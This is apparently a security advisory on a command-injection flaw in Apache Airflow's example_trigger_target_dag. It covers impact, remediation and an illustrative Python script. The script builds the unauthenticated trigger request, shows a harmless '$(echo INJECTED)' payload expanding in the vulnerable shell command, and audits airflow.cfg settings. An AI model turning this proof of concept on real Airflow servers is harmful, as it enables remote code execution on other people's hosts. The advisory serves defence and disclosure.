Actively Exploited in the Wild

This vulnerability is being actively exploited in the wild.

Apache Airflow Remote Code Execution Vulnerability in Example DAG

Vulnerability

A remote code execution vulnerability has been identified in Apache Airflow versions 1.10.10 and prior. It is a command injection in 'example_trigger_target_dag', one of the example DAGs shipped with Airflow: the DAG's bash task templates a value taken from the DAG run's 'conf' straight into its shell command string, so any authenticated user who can trigger that DAG can execute arbitrary commands as the user running the Airflow worker or scheduler (which one depends on the executor in use). Instances with the 'load_examples' option set to 'False' do not load the example DAGs and are not affected.

Impact

Successful exploitation gives the attacker arbitrary command execution on the host where the Airflow worker or scheduler runs, with the privileges of that process. Because the injected command is carried in a DAG run's 'conf', it also leaves a record in the Airflow metadata database that can be used to scope an incident.

Reproduction

To reproduce this vulnerability, trigger a run of 'example_trigger_target_dag' with a crafted 'conf'. In version 1.10.10 the Experimental REST API accepts requests without authentication by default (its default '[api] auth_backend' allows all requests), so the DAG can be triggered by an unauthenticated 'POST /api/experimental/dags/example_trigger_target_dag/dag_runs' request; where the API has been locked down, any authenticated user can still trigger the DAG through the web UI or the API. The payload is placed in the 'message' key of 'conf', which the example DAG's bash task renders into its command string. Once the scheduler picks up the run and the task executes, the injected command runs on the server.

Remediation

Users are advised to upgrade to Apache Airflow version 1.10.11 or later, where the example DAG passes the 'conf' value to the shell through an environment variable instead of the command string, and the Experimental API denies unauthenticated requests by default. If an upgrade is not possible, set 'load_examples' to 'False' in airflow.cfg (or export AIRFLOW__CORE__LOAD_EXAMPLES=False) and restart the scheduler and webserver so the example DAGs are no longer loaded; additionally configure an '[api] auth_backend' that requires authentication (for example 'airflow.contrib.auth.backends.password_auth') so the DAG trigger endpoint is not reachable anonymously.
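The following Python script is an added illustration of the reproduction and remediation described above; it is not code from this page or from the Apache Airflow project. It reproduces the bash_task command template of the 1.10.10 example DAG beside the 1.10.11 form, runs both through /bin/sh with an injected 'message' so the difference is observable, builds the Experimental API request body an attacker would POST (the endpoint path is the 1.10 experimental API path, not verified here against a live server), and audits a constructed airflow.cfg for the two settings that matter. Jinja rendering is stood in for by a plain string substitution of the template expression, so the script runs without Airflow installed.

```python
import configparser
import json
import os
import subprocess

DAG_ID = "example_trigger_target_dag"

# The template expression the example DAG uses for the conf value. Jinja is
# replaced below by a plain substitution of this expression (an assumption
# made so the script runs offline); Airflow renders it the same way.
PLACEHOLDER = '{{ dag_run.conf["message"] if dag_run else "" }}'

# bash_task as shipped in Airflow 1.10.10: conf value goes into the command.
VULNERABLE_CMD = 'echo "Here is the message: \'' + PLACEHOLDER + '\'"'

# bash_task as shipped in Airflow 1.10.11: conf value goes into an env var,
# and the command only references "$message".
HARDENED_CMD = 'echo "Here is the message: $message"'
HARDENED_ENV = {"message": PLACEHOLDER}


def render(template, message):
    """Stand-in for Airflow's Jinja rendering of one template field."""
    return template.replace(PLACEHOLDER, message)


def run_vulnerable(message):
    """1.10.10 behaviour: the conf value is rendered into the shell command."""
    cmd = render(VULNERABLE_CMD, message)
    out = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True,
                         text=True, check=True)
    return out.stdout.strip()


def run_hardened(message):
    """1.10.11 behaviour: the conf value reaches the shell only as $message."""
    env = dict(os.environ)
    env["message"] = render(HARDENED_ENV["message"], message)
    out = subprocess.run(["/bin/sh", "-c", HARDENED_CMD], capture_output=True,
                         text=True, check=True, env=env)
    return out.stdout.strip()


def trigger_request(base_url, message):
    """URL and JSON body of the experimental-API call that triggers the DAG."""
    url = "%s/api/experimental/dags/%s/dag_runs" % (base_url, DAG_ID)
    return url, json.dumps({"conf": {"message": message}})


def audit_config(cfg_text):
    """Return findings for the two airflow.cfg settings relevant to this issue."""
    cfg = configparser.ConfigParser()
    cfg.read_string(cfg_text)
    findings = []
    # Airflow 1.10 loads the example DAGs unless load_examples is False.
    if cfg.getboolean("core", "load_examples", fallback=True):
        findings.append("core.load_examples is True: example DAGs, including "
                        "example_trigger_target_dag, are loaded")
    # The 1.10.10 default backend allows every experimental-API request.
    backend = cfg.get("api", "auth_backend",
                      fallback="airflow.api.auth.backend.default")
    if backend == "airflow.api.auth.backend.default":
        findings.append("api.auth_backend is the 1.10.10 default: the "
                        "experimental API accepts unauthenticated requests")
    return findings


# Constructed sample configs (not taken from any real deployment).
WEAK_CFG = """\
[core]
load_examples = True

[api]
auth_backend = airflow.api.auth.backend.default
"""

HARDENED_CFG = """\
[core]
load_examples = False

[api]
auth_backend = airflow.contrib.auth.backends.password_auth
"""

if __name__ == "__main__":
    payload = "$(echo INJECTED)"
    print("1.10.10 output:", run_vulnerable(payload))
    print("1.10.11 output:", run_hardened(payload))
    print("trigger request:", trigger_request("http://airflow.example:8080", payload))
    for finding in audit_config(WEAK_CFG):
        print("finding:", finding)
```

The single quotes around the template value in the 1.10.10 command do not help: they sit inside double quotes, where `$(...)` and backticks are still expanded and a literal `"` in the payload ends the string and starts a new command. Moving the value into an environment variable means the shell only ever sees `$message`, which expands to the raw string without re-evaluating it.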

Added: Mar 16, 2026, 8:22 PM
Updated: Mar 16, 2026, 8:22 PM

Vulnerability Rating

Custom Algorithm
spread: 5.0
impact: 7.5
exploitability: 9.2
remediation: 8.3
relevance: 0.0
threat: 9.9
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.